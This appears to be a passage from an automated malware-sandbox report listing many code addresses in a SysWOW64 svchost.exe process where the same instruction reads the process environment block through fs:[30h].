                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]1_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]1_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]1_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]1_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]1_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]1_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]1_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]1_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]1_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]1_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]1_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]1_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]1_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]1_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
